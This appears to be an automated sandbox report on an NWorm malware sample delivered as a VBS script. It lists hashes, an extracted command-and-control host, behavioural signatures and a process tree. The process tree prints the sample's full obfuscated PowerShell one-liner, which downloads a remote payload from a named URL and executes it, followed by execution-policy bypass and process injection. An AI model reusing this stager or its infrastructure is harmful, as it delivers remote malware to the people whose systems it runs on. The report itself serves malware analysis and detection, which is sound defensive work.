Analysis
- max time kernel: 78s
- max time network: 142s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 28-04-2022 06:43
Static task: static1
Behavioral task: behavioral1
- Sample: ASNQSKJPXJLKFXSIEUQYZ.vbs
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: ASNQSKJPXJLKFXSIEUQYZ.vbs
- Resource: win10v2004-20220414-en
General
- Target: ASNQSKJPXJLKFXSIEUQYZ.vbs
- Size: 2KB
- MD5: f04ca5c16f111ab69293045badd53ad9
- SHA1: 1184fafe345b6f79d6a28d87ef957d7f96b76f52
- SHA256: 00b3ede6f9c3073b02afc09611974bdc4765400ac8c039d620679083b88f63fe
- SHA512: f07b185f0b78ff3962767a7f2d85957ca9057ee049fdf90d041bd405dcc23fe2a79c71143fde8b907153942be9525941af7ffc2d9e25f6bf1717cb43990f200b
Malware Config
Extracted
- Family: nworm
- Version: v0.3.8
- C2: hnahmoneu.duckdns.org:6391
- 30896040
Signatures

NWorm
A TrickBot module used to propagate to vulnerable domain controllers.

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: Powershell.exe, powErshEll.exe
- description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | pid: 3720 | pid_target: 4932 | process: Powershell.exe
- description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | pid: 4648 | pid_target: 4932 | process: powErshEll.exe

Blocklisted process makes network request (1 IoCs)
Processes: Powershell.exe
- flow: 5 | pid: 3720 | process: Powershell.exe

Suspicious use of SetThreadContext (1 IoCs)
Processes: powershell.exe
- description: PID 4236 set thread context of 4956 | pid: 4236 | process: powershell.exe | target process: aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: Powershell.exe, powershell.exe, powErshEll.exe, powershell.exe
- pid: 3720 | process: Powershell.exe (2 entries)
- pid: 3644 | process: powershell.exe (2 entries)
- pid: 4648 | process: powErshEll.exe (2 entries)
- pid: 4236 | process: powershell.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: Powershell.exe, powershell.exe, powErshEll.exe, powershell.exe
- Token: SeDebugPrivilege | pid: 3720 | process: Powershell.exe
- Token: SeDebugPrivilege | pid: 3644 | process: powershell.exe
- Token: SeDebugPrivilege | pid: 4648 | process: powErshEll.exe
- Token: SeDebugPrivilege | pid: 4236 | process: powershell.exe
- The remaining 60 entries are all pid 3644 (powershell.exe), which cycles through the following 21 tokens in this order three times over, the third pass stopping after token 33: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of WriteProcessMemory (16 IoCs)
Processes: Powershell.exe, powershell.exe, powErshEll.exe, cmd.exe, powershell.exe
- description: PID 3720 wrote to memory of 3644 | pid: 3720 | process: Powershell.exe | target process: powershell.exe (2 entries)
- description: PID 3644 wrote to memory of 2348 | pid: 3644 | process: powershell.exe | target process: WScript.exe (2 entries)
- description: PID 4648 wrote to memory of 2132 | pid: 4648 | process: powErshEll.exe | target process: cmd.exe (2 entries)
- description: PID 2132 wrote to memory of 4236 | pid: 2132 | process: cmd.exe | target process: powershell.exe (2 entries)
- description: PID 4236 wrote to memory of 4956 | pid: 4236 | process: powershell.exe | target process: aspnet_compiler.exe (8 entries)
Processes

- C:\Windows\System32\WScript.exe (depth 1, PID 1688)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ASNQSKJPXJLKFXSIEUQYZ.vbs"

- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe (depth 1, PID 3720)
  Command line: Powershell $OZKQAUNQZBLNAOSVUSYESJ = '[S55]!+$]+%*+![<%[[(1[52EM.I=*4$50233)@{\960!01}$^MREAdER]'.Replace('55]!+$]+%*+![<%[[(1[52','ySt').Replace('=*4$50233)@{\960!01}$^','O.StREA');$BXJWCEVOETSZXVTQVVBBQI = ($OZKQAUNQZBLNAOSVUSYESJ -Join '')| .('{1}{0}'-f'EX','I');$BFZNFKRZGXUCXFHDPCRKXY = '[SyS%6%+4/%=5{=\{8![%6+#6*T.W76\/(1*\*=(4@_@@/2<$]8ST]'.Replace('%6%+4/%=5{=\{8![%6+#6*','TEm.NE').Replace('76\/(1*\*=(4@_@@/2<$]8','EbREquE');$UBJZAYXIRZKFCCUCKLTOFV = ($BFZNFKRZGXUCXFHDPCRKXY -Join '')| .('{1}{0}'-f'EX','I');$HNWHJYJEZGKAPCJXAVBIDJ = 'Cr_})4!/]!57\*_9\{8<-<97TE'.Replace('_})4!/]!57\*_9\{8<-<97','Ea');$PYADPHPAUKFOLHATAFZQNV = 'GE\(#7%+58^$6<4!)!*0<2&&onSE'.Replace('\(#7%+58^$6<4!)!*0<2&&','tRESp');$RRJLPFSIPIYQFCZCXNSWIQ = 'GE1@)[6_08}$/}5&2+--(2%8REam'.Replace('1@)[6_08}$/}5&2+--(2%8','tRESponSESt');$EQLBEGTOHFJKWFRNRAQNWI = 'RE2{$[&]8)4\!4]]@0#]+9)_nD'.Replace('2{$[&]8)4\!4]]@0#]+9)_','aDToE'); .('{1}{0}'-f'EX','I')($BXJWCEVOETSZXVTQVVBBQI::new($UBJZAYXIRZKFCCUCKLTOFV::$HNWHJYJEZGKAPCJXAVBIDJ('https://www.wnsolutions.potius.com.br/ServerTyw.txt').$PYADPHPAUKFOLHATAFZQNV().$RRJLPFSIPIYQFCZCXNSWIQ()).$EQLBEGTOHFJKWFRNRAQNWI())
  Signatures: Process spawned unexpected child process; Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 3644)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.ps1'"
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WScript.exe (depth 3, PID 2348)
      Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.vbs"

- C:\Windows\System32\WindowsPowerShell\v1.0\powErshEll.exe (depth 1, PID 4648)
  Command line: powErshEll -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.bat
  Signatures: Process spawned unexpected child process; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

  - C:\Windows\system32\cmd.exe (depth 2, PID 2132)
    Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.bat""
    Signatures: Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 4236)
      Command line: PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\JHZOILCYEIXTNXBBHSHQJA.ps1'"
      Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (depth 4, PID 4956)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Downloads